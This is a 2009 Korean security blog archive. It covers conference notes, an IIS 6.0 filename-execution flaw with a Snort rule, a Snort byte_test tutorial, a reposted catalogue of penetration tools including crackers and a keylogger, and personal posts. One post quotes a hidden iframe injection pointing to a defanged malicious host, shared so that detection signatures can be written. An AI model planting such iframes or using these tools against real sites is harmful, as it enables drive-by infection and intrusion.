보안 이야기2009. 11. 19. 10:22

내용이 허접하기 때문에 기대를 안하시는게 좋을 것 같습니다..^^

 사견과 이해를 제대로 못해서 잘못 작성한 부분도 있을것입니다. 그런 부분도 감안해주시기 바랍니다.

 

첫째 날

 

1.     마이크로소프트가 분석한 최신 취약성 및 공격형태 - jacqueline Peterson(MS)
 

아래의 MS 사이트에서 전세계에서 수집한 정보로 최신 보고를 다운로드 받으실 수 있습니다.

http://www.microsoft.com/downloads/details.aspx?displaylang=ko&FamilyID=037f3771-330e-4457-a52c-5b085dc0a4cd

 

요약하자면 보고서의 내용을 보면 MS 제품의 취약성은 현존하는 다른 취약성과 비교하였을 때 많은 취약성을 가진 것이 아니라는 내용과 MS社 제품을 최신 업데이트로 유지하면 공격에 대한위험을 줄일 수 있다는 것입니다.

 

결국 정품을 사용해서 사용자들 스스로를 보호해야 하지 않겠냐는 내용이었습니다.

아래의 그래프는 OS가 발매 되고 시간의 흐름에 따라 발견된 취약성의 수의 변화를 보여준다고 합니다.

Windows XP > Windows VISTA > Windows 7 순으로 최약성이 떨어지고 있으니 최신 제품을 사용하라고도 하네요.

 


 

2.     Global Trend on Information Security Practice – Gerry Chung(Ernst&Young)

 

미국의 Heartland社 라는 기업이 있습니다. 종종 미국에서 신용카드 고객의 정보가 해킹되어 유출되었다는 신문기사를 접해 보셨을 것입니다.

Heartland社에서 발생했다고 합니다. 이 회사는 사고 나기 몇 달전에 안전진단 감사를 받아서 안전하다는 진단을 받았다고 합니다.

그러나 해킹 사고가 터졌고 이로 인해 감사를 한 회사에 소송을 걸었으나 패소를 했다고 합니다.

이유인즉 당시 감사를 받았을 당시에는 담당자들이 신경을 써서 많은 준비를 했었으나, 감사를 받고 난 후에는 별로 신경을 쓰지 않았다는 것입니다.

주 내용은 꾸준한 RISK를 관리하자는 것이었습니다.

 

이 내용을 듣고 우리 나라 기업들도 마찬가지라는 생각이 들었습니다.

꾸준한 RISK 관리의 중요성에 대해 보안 담당자들은 인지하고 있지만 CEO 들의 보안에 대한 인지 수준이 낮아서 그런게 아닌가 싶습니다.

 

3.     PC 근원지 추적, 차단, 격리 및 차단방안 윤광택(시만텍)

 

제품 홍보라 전달한 만한 내용은 없습니다.

 

4.     웹 호스팅 업체의 홈페이지 보안성 강화 서진원(KISA)

 

웹 호스팅 업체에서 홈페이지의 보안성을 강화하기 위한 방안에 대한 내용이었습니다.

 

- 공개 프로그램에 대해 최신 프로그램으로 패치 및 업그레이드를 하자.

구버전 제로보드, 테크노트 등 보안 패치

 

- 국외발 IP 주소 집중 점검하자

https://ip.kisa.or.kr/ip_cate_stat/stat_05_04.act

위 사이트 링크에서 국내 IP 할당 현황을 엑셀로 다운로드 받을 수 있습니다.

KISA에서는 위 IP 할당현황 파일을 가지고 로그에서 국외발 IP를 검출하는 스크립트를 제작 중이라고 하며 추후에 배포한다고 합니다.

 

- 불필요한 PORT 개방을 제한하자 였습니다..

- 주요 OS 파일 무결성 검사

 

- 리눅스 무료 백신 설치 및 주기적인 검사

ClamAV : http://www.clamav.net

 

- 비정상 행위 모니터링

 

현재 KISA에서 제공하고 있는 캐슬과 휘슬에 대한 설명이 있었으며, 휘슬의 경우 2.0 버전이 나오게되며 사용자들의 요구사항을 받아 들여 C/S 형태로 개발 되었다고 합니다.

다수의 서버를 모니터링 할 수 있게끔 한다고 하네요..

 

5.     가상화 환경이 가져오는 보안관리의 패러다임 변화 김형종(서울여대)

 

가상화 관련 내용이긴한데 학부에서나 배우는 기초적인 내용 들이었던 것 같습니다.

http://www.itdaily.kr/news/articleView.html?idxno=15530#

위 기사 내용에서보면 VMsafe라는 기술에 대한 언급이 있는대 가상화 I/O에 쉽게 접근하기 위한위한 것 보이는데 자세한 사항은 모르겠습니다.

주로 VMsafe 라는 키워드로 검색해보면 해외 유수의 보안 업체들이 API를 제공한다고 하는데 자세하게 읽어보질 못해서 전달이 안되겠네요..

 

6.     PC 가용성을 침해하는 보안 이중성 김요셉(방위사업청)

 

보안담당자로서 PC 가용성을 확보해야 보안담당자의 가용성도 확보된다는 내용이었습니다.

기업들의 PC에 많은 에이전트 프로그램들이 설치되는데 프로그램들간의 충돌 문제를 해결하기 위해 적절한 BMT를 해야한다는 내용과 PC들에서 사용되는 프로세스에 대한 숙지와 필요 없는 프로세스들은 중지를 시켜야한다는 내용이었습니다.

 

둘째 날

 

1.     금융IT 부문 사이버테러위협 대응방안 - 김인석(금융감독원)

 

이번 7.7 대란으로 계기로 은행권들은 12월말까지 DDoS 공격에 대한 대응방안을 마련하게끔 정책화 했다는 내용이었으면 향휴 기타 금융권, 증권사, 보험사로 확대한다는 것이 었습니다.

DDoS 에 대해서 자체적으로 보안하고 모니터링을 해야하며, 회사에 맞게끔 외부 관제인력을 활용하는 방안에 대해서 언급이 있었습니다.

 

 

2.     컨버전스 시대에서의 기업 정보보호 전략 신수정(SK C&C)

 

정부 정책과 향후 미래의 보안(또는 IT)을 생각하면 융합 보안입니다.

융햡되는 부분은 의료, 에너지, 금융, 건설, 자동차, 국방, 이동통신이 될것으로 보인다고 합니다.

보안(또는 IT)와 기타 산업과의 융합에서 화두가 되는 것은 지식이라고 합니다.

보안(또는 IT)과 융화될 산업에 대한 두 가지 지식을 가지고 있는 인재가 없다는 것입니다.

 

SK C&C에서 SK 인포섹를 인수하였음에도 불구하고 SK C&C에서 보안 사업분야로 진출한다는 것은 기타 산업과의 보안(또는 IT) 융합에 대한 사업분야로 생각됩니다.

 

신수정 박사는 SK 인포섹에 계셨는데 이번에 위 사업 때문에 SK C&C 상무로 옮기신 것 같습니다.

 

3.     BCP기반의 Cloud Based DDoS Mitigration Service – 김향진(DDoS대응센터)

 

http://www.ddaily.co.kr/news/news_view.php?uid=56355

위 링크 기사에도 나왔지만 세계의 회사에서 연합한 형태의 서비스입니다.

 

대역폭 고갈형태의 DDoS 공격은 유섹에서 100G 대역폭으로 보완해서 고객 서버로 깨끗한 트래픽을 Proxy 형태로 전달하고, 기타 DDoS 공격의 경우에는 이니텍에서 인증 기반의 화이트리스트 방식으로 인증된 패킷의 트래픽만 걸러내고 비인증된 패킷의 경우에는 블랙리스트에 등록 시킵니다.

마지막으로 체크 포인트에서 블랙리스트의 등록된 비인증 IP Drop 시킨다는 형태의 서비스 입니다.

 

4.     최신 ISP 보안 위협 현황 및 대응방안 이상엽(KT)

 

일반 기업의 경우 DDoS 공격이 1년에 2번 정도 들어온다고 본다고 하면 KT와 같은 ISP는 매일 공격 트래픽이 발생된다고 합니다.

 

그래서 그 이유는 분석해보았는데 결론은 게임 프리서버 때문이라고 합니다.

프리서버란 게임 소스가 유출되면 그 게임 소스로 컴파일해서 정상적인 게임서버가 아닌 비정상적인 게임서버로 사용한다는 것입니다.

주 목적은 지인들과의 친목도모로 돈이 안든다는 개념으로 생겼다고 합니다.

 

그러나 프리서버가 변질되어 돈 벌이로 생긴다고 합니다.

카페에 회원들을 가입시키고 게임접속기를 다운로드 받게하여 프리서버에 접속해서 게임을 하게한답니다.

그런데 게임접속기를 다운로드 받기 위해서는 웹 하드에 접속해서 100~500원의 데이터 다운로드 비용이 발생하게 됩니다. 이 금액이 프리서버를 운영하는 사람에게 들어갑니다.

 

어느정도 회원을 모집하고 나면 프리서버를 폐쇄하고 다시 새로 만든다고 합니다.

 

이유는 프리서버 운영자의 수입원은 웹 하드에서 게임 접속기를 다운로드 받는 비용인데 가입자가 들지 않으면 돈벌이가 안되기 때문에 2개월 후에 폐쇄하고 다시 위와 같이 반복한다고 합니다.

 

이렇게 프리서버를 운영하는 사람들을 응징하기 위해 게임 유저들이 팸폭(?) 이라는 카페에 DDoS공격을 의뢰한다고 합니다. 그래서 매번 ISP에는 DDoS 공격이 들어온다고 합니다.

 

5.     공격 트래픽 우회처리를 통한 DDoS 대응전략 나원택(씨디네트웍스)

 

앞에 언급한  DDoS대응센터와 비슷한 맥락입니다.

대역폭 고갈 형태의 DDoS 공격을 CDN 기술을 이용해서 트래픽을 분산시킨 후 DDoS 장비를 통해 걸러진 깨끗한 트래픽을 고객의 서버로 전달한다는 것입니다.

 

CDN 기술은 사용자가 접속할 때 가장 가까운 IDC의 서버로 접속을 하게끔 해주고, 실질적으로 서비스 되는 서버와 컨텐츠 동기화를 주기적으로 함으로써 실제 서비스되는 서버의 부하를 줄이고 고객들에게는 빠른 접속을 보장해주는 기술입니다.

 

제가 생각한 단점은 DDoS 장비가 슬로우 공격을 막아줄 수 있는냐 입니다.

 

6.     VoIP의 최근 보안 위협 및 대응방안 윤석웅(KISA)

 

VOIP 공격형태에 대한 내용이 었으며 기존에 공개된 공격과는 차이점이 없는 것 같습니다.

12월 초에 VoIP에 대한 법제화 공청회(?)를 개최한다고 하니 그때 참가해서 향후 VoIP에 법제화 내용을 확인해볼 생각입니다.

Posted by regexkorea
걱정이 Life2009. 11. 12. 13:11
이때 친구들하고 재미있게 찍었던 기억이 난다..
수업 발표때도 재미있다는 평이 었는데...

Posted by regexkorea
걱정이 Life2009. 11. 12. 13:09
SKT 앱스토어 광고를 보고 깜짝 놀랐었다..
2003년도에 대학교 수업으로 만들어보려고했던 게임이었는데..ㅡ.,ㅡ 기술이 안되서 현실감있게 못만들었던 기억이 난다.
1% 영감과 99%노력이라고 했던가?
내가 볼때는 타이밍이다..

Posted by regexkorea
걱정이 Life2009. 10. 30. 10:04
밑 빠진 독에도 오래 물을 붓다 보면, 그 물이 스며들어 주변에 꽃이 피고 풀들이 자라서 나를 돕는다.

와닿는 문구다..
밑 빠진 독에 물을 붓는다는 것은 어찌보면 사람들의 비웃음거리가 된다.
그래도 그만큼 노력하면 다른 방향으로 결과가 돌아오지 않을까?

내가 하는일이 엉뚱하고 말도 안되는 일이라고 생각해도 너희들은 시도라도 해보았고 노력이라도 해봤냐?
그러니 나를 비웃지마라 세상아~
Posted by regexkorea
IIS 6.0에서 파일명을 제대로 검증하지 않고 실행시키는 취약성이 발견되었다.

이 취약성에 대해서는 중국사이트에서 발견되었으며, 급속도로 Ctrl+C Ctrl+V 되어 가고 있다.. ^^


II6.0에 다 된다고 해서 테스트해보았으나 특정한 환경에서 가능하다는 것을 깨닭고 포기를 했으나, skinfosec 블로그에서 보고특정 환경에서만 가능하다는 정도만 파악했다.. 귀찮고 할일이 많아서 여유가 있으면 다시 테스트 해봐야겠다.

http://mss.skinfosec.co.kr/docs/wp-content/uploads/2009/10/skinfosec-chr-033-file-name-vulnerability-in-iis.pdf

II6.0이 설치되어 있고 OS 버전이 아래와 같으면 취약하다고 한다.
- 5.2.3790 SP1
- 5.23790 SP2
- 5.2.3790 SP2+ 최신보안 업데이트

대응방안으로는 MS社에서 패치가 나오거나 아래와 같이 설정을 변경한다.



파일의 이름은 223자까지 사용되는것으로 보이기고  jpg,gif 이외에 다른 파일 확장자도 되는지 확인 해봐야하기때문에 우선 공개된 내용으로 패턴을 만들어 보았다.
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"MS IIS 6.0 x.asp;x.jpg/x.php;x.jpg File Execution"; flow:established, to_server; pcre:"/[a-zA-Z0-9_]{1,223}\.(asp|php)\;[a-zA-Z0-9_]{1,223}\.(jpg|gif)/mi";sid:XXXX;)

Posted by regexkorea
보안 프로그램2009. 10. 14. 11:56

Packet
Shaper:

  • Nemesis:
    a command line packet shaper
  • Packit:
    The Packet Toolkit – A network packet shaper.
  • Hping
    by Antirez: a command line TCP/IP packet shaper
  • Sing:
    stands for ‘Send ICMP Nasty Garbage’; sends fully customizeable ICMP
    packets
  • Scapy:
    a new python-based packet generator

Password
Cracker/Login Hacker:

  • John
    the Ripper
    : a well-known
    password cracker for Windows and *nix Systems
  • Djohn:
    a distributed password cracker based on "John
    the Ripper
    "
  • Cain
    & Abel
    : an advanced
    password recovery tool for windows systems. It sniffs the network
    packets an cracks authentication brute-force or with dictionary
    attacks.
  • Project
    RainbowCrack
    : Advanced instant
    NT password cracker
  • Rainbowtables: The
    shmoo group provides pre-generated rainbow tables for bittorrent
    download. The tables are generated with RainbowCrack (see above).
  • Windows
    NT
    password recovery tool
    by Peter
    Nordahl
  • THC-Dialup
    Login Hacker
    by THC. It tries to
    guess username and password against the modem carrier. As far as I know
    the only available dialup password guesser for *NIX.
  • Hydra
    by THC: a multi-protocol login hacker. Hydra is also integrated with Nessus.
  • Medusa: parallel network login auditor
  • THC
    imap bruter
    : a very fast imap
    password brute forcer
  • x25bru:
    a login/password bruteforcer for x25 pad
  • Crowbar: a generic web brute force tool (Windows only; requires .NET Framework)
  • MDCrack-NG: a very fast MD4/MD5/NTLMv1 hash cracker; works optionally with precomputed hash tables

Advanced
Sniffers:

  • Wireshark (formerly known as Ethereal): an open source network protocol analyzer
  • Dsniff
    by Dug Song: a combination of very useful sniffer and man-in-the-middle
    attack tools
  • Ettercap:
    a multipurpose sniffer/interceptor/logger for switched LAN environments
  • aimsniffer:
    monitors AOL instant messager communication on the network
  • 4G8:
    a tool ,similar to ettercap, to capture network traffic in switched
    environments
  • cdpsniffer:
    Cisco discovery protocol (CDP) decoding sniffer

Port
Scanner / Information Gathering:

  • nmap:
    the currently most well-known port scanner. Since version 3.45 it
    supports version
    scans
    . Have a look at PBNJ for diffing different nmap scans.
  • ISECOM
    released their nmap wrapper NWRAP,
    which shows all known protocols for the discovered ports form the Open
    Protocol Resource Database
  • Nmap::Scanner:
    Perl output parser for nmap
  • Amap
    by THC: An advanced portscanner which determines the application behind
    a network port by its application handshake. Thus it detects well-known
    applications on non-standard ports or unknown applications on
    well-known ports.
  • vmap
    by THC: version mapper to determine the version (sic!) of scanned daemons
  • Unicornscan:
    a information gathering and correlation engine
  • DMitry (Deepmagic Information Gathering Tool): a host information gathering tool for *nix systems
  • Athena:
    a search engine query tool for passive information gathering

Security
Scanner:

  • Nessus
    - In version 2 an OpenSource network scanner. Version 3 is only available in binary form and under a proprietary license.
  • OpenVAS: a fork of Nessus 2.2.5 (formerly known as GNessUs)

  • Nessj: a java based nessus (and compatibles) client (formerly known as Reason)
  • Paul
    Clip from @stake released AUSTIN,
    a security scanner for Palm OS 3.5+.

Webserver:

  • Nikto:
    a web server scanner with anti IDS features. Based on Rain Forest
    Puppies libwhisker
    library.
  • Wikto: a webserver assessment tool (Windows only; requires .NET framework)
  • WSDigger:
    a black box web pen testing tool from Foundstone (Windows based)
  • Metis:
    a java based information gathering tool for web sites

Fingerprinting:

  • SinFP: a fingerprinting tool which requires only an open tcp port and sends maximum 3 packets
  • Winfingerprint:
    much more than a simple fingerprinting tool.It scans for Windows
    shares, enumerates usernames, groups, sids and much more.
  • p0f
    2
    : Michal Zalewski announced his
    new release of p0f 2, a passive OS fingerprinting tool. p0f 2 is a
    completely rewrite of the old p0f code.
  • xprobe2:
    a remote active operating system fingerprinting tool from Ofir Arkin
    and the xprobe2 team
  • Cron-OS:
    an active OS fingerprinting tool based on TCP timeout behavior. This
    project was formerly known as "RING" and is now published as a nmap
    addon.

Proxy
Server:

  • Burp
    proxy
    : an interactive HTTP/S
    proxy server for attacking and debugging web-enabled applications
  • Screen-scraper:
    a http/https-proxy server with a scripting engine for data manipulation
    and searching
  • Paros:
    a man-in-the-middle proxy and application vulnerability scanner
  • WebScarab: a framework for analyzing web applications. One of it’s basic functionality is the usage as intercepting proxy.


War Dialers:

  • IWar: a classic war dialer. One of a few wardialers for *nix operation systems, and the only with VOIP functionality (to my knowledge)
  • THC-Scan: a war dialer for DOS, Windows and DOS emulators

Malware / Exploit Collections:

  • packetstormsecurity.org:
    Huge collections of tools and exploits
  • ElseNot Project: The project tries to publish an exploit for each MS Security Bulltin. A script kiddie dream come true.
  • Offensive Computing: Another malware collection site
  • Securityforest: try the ExploitTree to get a collection of exploit code; have a look at the ToolTree for a huge list of pentest stuff


Databases / SQL:

  • sqlninja: a tool to exploit sql injection vulnerabilities in web applications with MS SQL Servers (alpha stage)
  • CIS
    Oracle Database Scoring Tool
    :
    scans Oracle 8i for compliance with the CIS Oracle Database
    Benchmark
  • SQLRecon:
    an active and passive scanner for MSSQL server. Works on Windows 2000,
    XP and 2003.
  • absinthe: a
    gui-based tool that automates the process of downloading the schema
    & contents of a database that is vulnerable to Blind SQL Injection
    (see here
    and here).
  • SQL Power Injector: a GUI based SQL injector for web pages (Windows, .Net Framework 1.1 required, Internet Explorer 5.0+ required)

Voice over IP (VOIP):

  • vomit (voice over misconfigured internet telephones): converts Cisco IP phone conversations into wave files
  • SiVuS: a VOIP vulnerability scanner – SIP protocol (beta, Windows only)
  • Cain & Abel: mostly a password cracker, can also record VOIP conversations (Windows only)
  • sipsak (SIP swis army knife): a SIP packet generator
  • SIPp: a SIP test tool and packet generator
  • Nastysip: a SIP bogus message generator
  • voipong: dumps G711 encoded VOIP communications to wave files. Supports: SIP, H323, Cisco Skinny Client Protocol, RTP and RTCP
  • Perl based tools by Thomas Skora: sip-scan, sip-kill, sip-redirectrtp, rtpproxy and ipq_rules
  • rtptools: a toolset for rtp recording and playing

Networkbased Tools:

  • yersinia: a network tool
    designed to take advantage of some weakeness in different network
    protocols (STP, CDP, DTP, DHCP, HSRP, 802.1q, VTP)
  • Netsed:
    alters content of network packets while
    forwarding the packets

  • ip6sic:
    a IPv6 stack integrity tester

VPN:

  • ike-scan:
    an IPSec enumeration and fingerprinting tool
  • ikeprobe:
    ike scanning tool
  • ipsectrace:
    a tool for profiling ipsec traffic in a dump file. Initial alpha release
  • VPNMonitor:
    a Java application to observer network traffic. It graphically
    represents network connections and highlights all VPN connections. Nice
    for demonstrations, if somewhat of limited use in a real pen test.
  • IKECrack:an IKE/IPSec cracker for pre-shared keys (in aggressive mode authentication [RFC2409])

DNSA:
DNS Auditing tool by Pierre Betouin

Hunt:
a session hijacking tool with curses GUI

SMAC:
a Windows MAC Address Modifying Utility. Supports Windows 2000 and XP.

The
WebGoat Project
: a web
application written in Java with intentional vulnerabilities. Supports
an interactive learning environment with individual lessons.

TSCrack:
a Windows Terminal Server brute forcer

Ollie
Whitehouse from @stake released some new cellular phone based
pentesting tools for scanning
(NetScan,
MobilePenTester).
All tools
require a Sony Ericsson P800 mobile phone. Unfortunately, @stake seems
no longer to support much of their free
security tools. So, use instead the alternativ download links above.

THC-FuzzyFingerprint:
generates fuzzy fingerprints that look almost nearly equal to a given
fingerprint/hash-sum. Very useful for MITM attacks.

BeatLM,
a password finder for LM/NTLM hashes. Currently, there is no support
for NTLM2 hashes. In order to get the hashes from network traffic, try ScoopLM.

THC
vlogger
: a linux kernel based
keylogger

The
Metasploit Framework
: an
"advanced open-source platform for developing, testing, and using
exploit code".

ATK (Attack Tool Kit): a comination of security scanner and exploit framework (Windows only)

Pirana: an exploitation framework to test the security of email content filters. See also the whitepaper

PassLoc:
a tool which provides the means to locate keys within a buffer. Based
on the article "Playing
hide and seek with stored keys
"
by Adi Shamir.

Dl-Hell:
identifies an executables dynamic link library (DLL) files

DHCPing:
a security tool for testing dhcp security

ldapenum:
a perl
script for enumeration against ldap servers.

Checkpwd: a dictionary based password checker for oracle databases

NirCmd from NirSoft: a windows command line tool to manipulate the registry, initiate a dialup connection and much more

Windows Permission Identifier: a tools for auditing user permissions on a windows system

MSNPawn: a toolset for footprinting, profiling and assesment via the MSN Search. Windows-only, .NET required

snmpcheck:a tool to gather information via snmp. Works on Linux, *BSD and Windows systems.

pwdump6: extract NTLM and LanMan hashes from Windows targets

출처 : lonerunners.net
원문 : http://www.lonerunners.net/1188-penetration-testing-tools.html

'보안 프로그램' 카테고리의 다른 글

Digital Forensic SIFTing: SUPER Timeline Creation using log2timeline-sift  (0) 2012.06.25
Backtrack IP 설정  (0) 2011.12.13
Packet Generator Tool  (0) 2011.11.21
nc 응답 테스트  (1) 2011.04.19
토마 호크 설치 하기  (1) 2009.09.22
Posted by regexkorea
걱정이 재태크2009. 10. 13. 13:37

http://blog.daum.net/park0404/7782717

위 블로그 주인장은 주문진 앞에 한동짜리 아파트를 4천여만원 가격으로 경매를 낙찰 받아서 가족 별장으로 사용하고 계신다.
경매 교육을 받았을때 해수욕장 인근 아파트를 경매로 낙찰 받아서 임대수익을 올리는 방법에 대해 들어본적이 있다.

1년에 성수기와 주말을 포함하여 60회 정도 임대를 한다고 해보자.. 많은가? 적은가? ^^
1박에 15~20만원의 임대비를 받는다고 한다면 년 700에서 1200만원의 수익을 올릴수있다.
4천만원에 최대 1200만원이라고 하면 년 25%정도의 수익이 생긴다.

그러나 문제점은 관리(이불, 청소, 물건분실) 부분이다. 들은 소리지만 부산에서는 아파트 입구에 슈퍼에서 열쇠, 아파트를 관리해준다고 들었다. 물론 직접 슈퍼에서 임대를 운영해주는 조건으로 알고있다..^^; 그리고 임대수익은 반반..뭐 관리해주시는 분들하고 얘기하기 나름이겠지만..

적은 돈으로 틈새 투자하기에는 좋은것 같다.. 언제나 바다가 보고싶으면 찾아갈수 있는 나만의 별장이 될수도 있으니깐...
Posted by regexkorea
SNORT2009. 10. 9. 16:16
공부하고 있는 것이다보니 틀린 부분이 분명히 있을것입니다.. 그리고 영어 이해력이 떨어져서 옵션의 설명이 틀릴 수 있습니다. 틀린 부분에 대한 지적 부탁 드리겠습니다.

byte_test는 특정 필드 값을 연산자를 이용해서 매칭 하는 기능(?)

사용방법
 byte_test: <bytes to convert>, [!]<operator>, <value>, <offset>[,relative] [,<endian>] [,<number type>, string];

byte to convert : 패킷으로 부터 끄집어 낼 byte 수
operator : <,>,=,!,&,^
value : 변환된 값과 비교할 값
offset : payload에서 프로세싱 시작할 byte 수
relative : 마지막으로 패턴 매칭된 offset에서 시작
endian : [byte to convert] 의 값을 big endian 또는 little endian 형태로 처리하는 옵션
            big-big endian으로 테이터 처리(default)
            little-little endian으로 데이터 처리
string :  패킷에서 데이터는 string 형태로 저장된다.(?)
number type : type of number being read
                    hex-변환된 string 데이터는 16진수로 표현된다.
                    dec-변환된 string 데이터는 10진수로 표현된다.
                    oct-변환된 string 데이터는 8진수로 표현된다

위에서 연산자 & 에 대해서 알아보자.
예는 https://forums.snort.org/forums/rules/topics/byte_test-and-the-operator-2 에서 언급된 것으로 해보자.

payload의 첫 16 byte 가 아래와 같다고 하자.
65 98 85 83 00 01 00 00 00 01 00 00 08 63 70 64

byte_test:1,&,2,3

10000101= '85’
00000010 = '2'
.........^ Not set
위 값들을 and 연산하면 아래와 같다.
00000000 ='0' 이기때문에 거짓

byte_test:1,&,1,3 
10000101 = ‘85’
00000001 ='1'
...........^ Set and Match!
00000001 ='1' 이기때문에 참

byte_test:1,&,128,2 
10011000 = ‘98’
10000000 = '128'
^ Not set
00000000 = '0' 이기때문에 거짓

snort에서는 참이면 탐지하는 것이다.

참고 했던 사이트에서 Joel_Esler 라는 사람이 답변한 내용에서 Bit Sequence 부분은 이해가 가지 않는다.

& is a bitwise “and”. So, for the first byte_test, it moves three bytes into a packet, takes one
byte, and checks to see if it is a 2. (So the 7th bit in the Bit Sequence is set), the second one
indicates that the 8th bit in the Bit Sequence is set, and the 3rd one indicates that the first bit in
the Bit Sequence is set.

'SNORT' 카테고리의 다른 글

SNORT+BASE 설치 메뉴얼 (DEBIAN/UBUNTU)  (0) 2011.09.19
정규 표현식 기호-2  (0) 2010.03.02
정규 표현식 기호-1  (0) 2010.03.02
국내 Snort Rule 공유 블로그  (1) 2009.09.15
Posted by regexkorea

<body bgcolor="#000000"><div style="display:none">ifkujtsasiumelcsgzbuzprmotxoetb<iframe width=933 height=353 src="hxxp://beage.ru:8080/index.php" ></iframe></div>

역시 이지스(bscry)가 제공해준 코드 입니다.

젠장 순서 바뀌는 것도 생각해봐야하고 갈수록 교묘해지네요..
style="display:none" 사용하는 방법도 있네요..

아래 포스팅된걸로는 탐지되지 않습니다.. 한 패턴으로 여러개를 잡는게 좋긴한데..너무 복잡해지네요..
복잡할수록 오탐의 가능성은 커지는데..

Posted by regexkorea
보안 이야기2009. 10. 9. 08:33

Adobe Reader and Acrobat 9.1.3 이전 버전에 대해서 Critical한 취약성이 있다고 한다.
영향 받는 OS로는 Windows, Macintosh and UNIX가 있으며 Windows의 경우에는 전부 영향이 있는게 아니라고 한다.

기존의 Adobe Reader and Acrobat 은 JavaScript를 이용한 공격이었기때문에 javascript 기능을 disable 하면 방어가 가능했다.

그러나 이번 취약성은 JavaScript기능을 disable해도 공격이 성공한다는데 문제 점이 있다.

 

아래의 사이트에서 짧은 영어 실력으로 요약(?) 해보았다.

 

Sans : http://isc.sans.org/diary.html?storyid=7300

Adobe : http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html

 

참고로 어제 iframe 삽입 공격에 대한 글을 올렸어쓴데, 그 경로를 클릭하면 Acrobat이 실행되던데...

위 취약점인지 궁금하네.. 아직 exploit이 없어 보이는데.. milw0rm이 접속이 안되는 관계로..확인이 안되네..^^

Posted by regexkorea